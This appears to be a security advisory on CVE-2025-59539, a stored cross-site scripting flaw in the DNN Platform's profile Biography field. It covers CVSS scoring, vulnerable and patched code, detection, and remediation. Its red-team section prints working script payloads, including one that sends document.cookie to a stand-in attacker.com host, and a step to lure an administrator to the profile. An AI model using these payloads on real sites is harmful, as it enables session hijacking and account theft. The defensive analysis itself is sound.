CVE-2025-59539
Executive Summary
CVE-2025-59539 is a stored Cross-Site Scripting (XSS) vulnerability in the DNN (formerly DotNetNuke) web content management platform. The flaw resides in the user profile's "Biography" field. An authenticated attacker with the ability to edit their own profile can inject arbitrary JavaScript code into this field. When any other user, including administrators or superusers, views the affected profile, the injected script executes in the context of the victim's browser session. This can lead to session hijacking, credential theft, defacement, or lateral movement within the DNN application. The vulnerability is patched in DNN Platform version 10.1.0.

Supply Chain & Package Security
This vulnerability affects the DNN Platform, an open-source .NET CMS. The risk is primarily to self-hosted instances. Organizations using DNN should verify their version and apply the patch immediately. There is no known compromise of the official distribution channels.
CVSS Breakdown & Threat Level
- CVSS Score: 6.3 (Medium)
- Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N
- Attack Vector (AV): Network - The attack is carried out over the network.
- Attack Complexity (AC): Low - No special conditions are required for exploitation.
- Privileges Required (PR): Low - The attacker needs a valid user account with profile editing privileges.
- User Interaction (UI): Required - The victim must view the attacker's profile.
- Scope (S): Unchanged - The vulnerability affects the same security authority (the web application).
- Confidentiality (C): High - An attacker can steal session cookies and access sensitive data.
- Integrity (I): High - An attacker can modify content or perform actions on behalf of the victim.
- Availability (A): None - The vulnerability does not directly impact availability.
Threat Level: Medium. While the CVSS score is moderate, the potential impact (session hijacking of administrators) elevates the risk for organizations using DNN.
Deep Dive & Mechanics
The vulnerability is a classic case of insufficient output encoding. The DNN platform stores the user's "Biography" field in the database. When rendering this field on a user's profile page, the application fails to properly sanitize or encode HTML/JavaScript content. Even though the field is not intended to be rich-text, the application does not strip out script tags or event handlers.
Attack Flow:
- Authentication: The attacker logs into the DNN site with a valid user account.
- Profile Manipulation: The attacker navigates to their profile settings and edits the "Biography" field.
- Payload Injection: The attacker inserts a malicious JavaScript payload, such as
<script>alert(document.cookie)</script>or a more sophisticated payload for session hijacking. - Victim Interaction: An administrator or another user views the attacker's profile page.
- Code Execution: The victim's browser renders the biography field, executing the injected JavaScript in the context of the DNN site.
- Impact: The attacker can steal cookies, perform actions on behalf of the victim, or deface the site.
Vulnerable vs. Patched Code
Vulnerable Code (Pre-10.1.0): The vulnerable code likely directly outputs the biography field without encoding. A simplified example in C# (ASP.NET WebForms) would be:
// Vulnerable: Direct output without encoding
<%= Profile.Biography %>
Patched Code (10.1.0+):
The patched code uses proper HTML encoding to neutralize the script. In ASP.NET, this is typically done using HttpUtility.HtmlEncode or the <%: %> syntax.
// Patched: HTML-encoded output
<%: Profile.Biography %>
Or using a Razor view:
// Patched: Razor automatically encodes
@Profile.Biography
Exploitation & Lab Setup
Red Team (Exploitation)
Prerequisites:
- A valid user account on a DNN instance running a version prior to 10.1.0.
- Access to the profile editing page.
Exploitation Steps:
- Log in to the DNN site.
- Navigate to your user profile (e.g.,
/UserProfile.aspx). - Edit the "Biography" field.
- Inject a JavaScript payload. For a proof-of-concept, use:
For a more impactful attack (session hijacking), use:<script>alert('XSS');</script><script> var img = new Image(); img.src = 'http://attacker.com/steal?cookie=' + document.cookie; </script> - Save the profile.
- Send a link to your profile to an administrator (e.g., via a direct message or forum post).
Blue Team (Detection & Prevention)
Detection:
- Monitor web application logs for unusual characters in the
Biographyfield during profile updates. - Look for outbound connections from the DNN server to unknown external IPs (potential cookie exfiltration).
- Use a Web Application Firewall (WAF) to detect and block XSS payloads.
Prevention:
- Immediate: Apply the patch by upgrading to DNN Platform 10.1.0 or later.
- Compensating Controls: If patching is not immediately possible, implement a WAF rule to block
<script>tags and common XSS patterns in theBiographyfield. - Code Review: Ensure all user-supplied data is properly encoded before rendering.
Indicators of Compromise (IOCs)
- Network:
- Outbound HTTP requests to attacker-controlled domains containing cookie data in the URL (e.g.,
GET /steal?cookie=...).

Remediation & Mitigation
Primary Remediation:
- Upgrade: Immediately upgrade to DNN Platform version 10.1.0 or later. This is the only complete fix.
Mitigation (if upgrade is delayed):
- Web Application Firewall (WAF): Deploy or configure a WAF to block requests containing
<script>tags or other XSS patterns in theBiographyfield. - Input Validation: Implement server-side validation to strip or reject HTML tags from the
Biographyfield. - Content Security Policy (CSP): Implement a strict CSP header that blocks inline scripts. This can prevent the execution of injected JavaScript even if the vulnerability is exploited.
- User Awareness: Educate users, especially administrators, to be cautious when viewing profiles of unknown users.
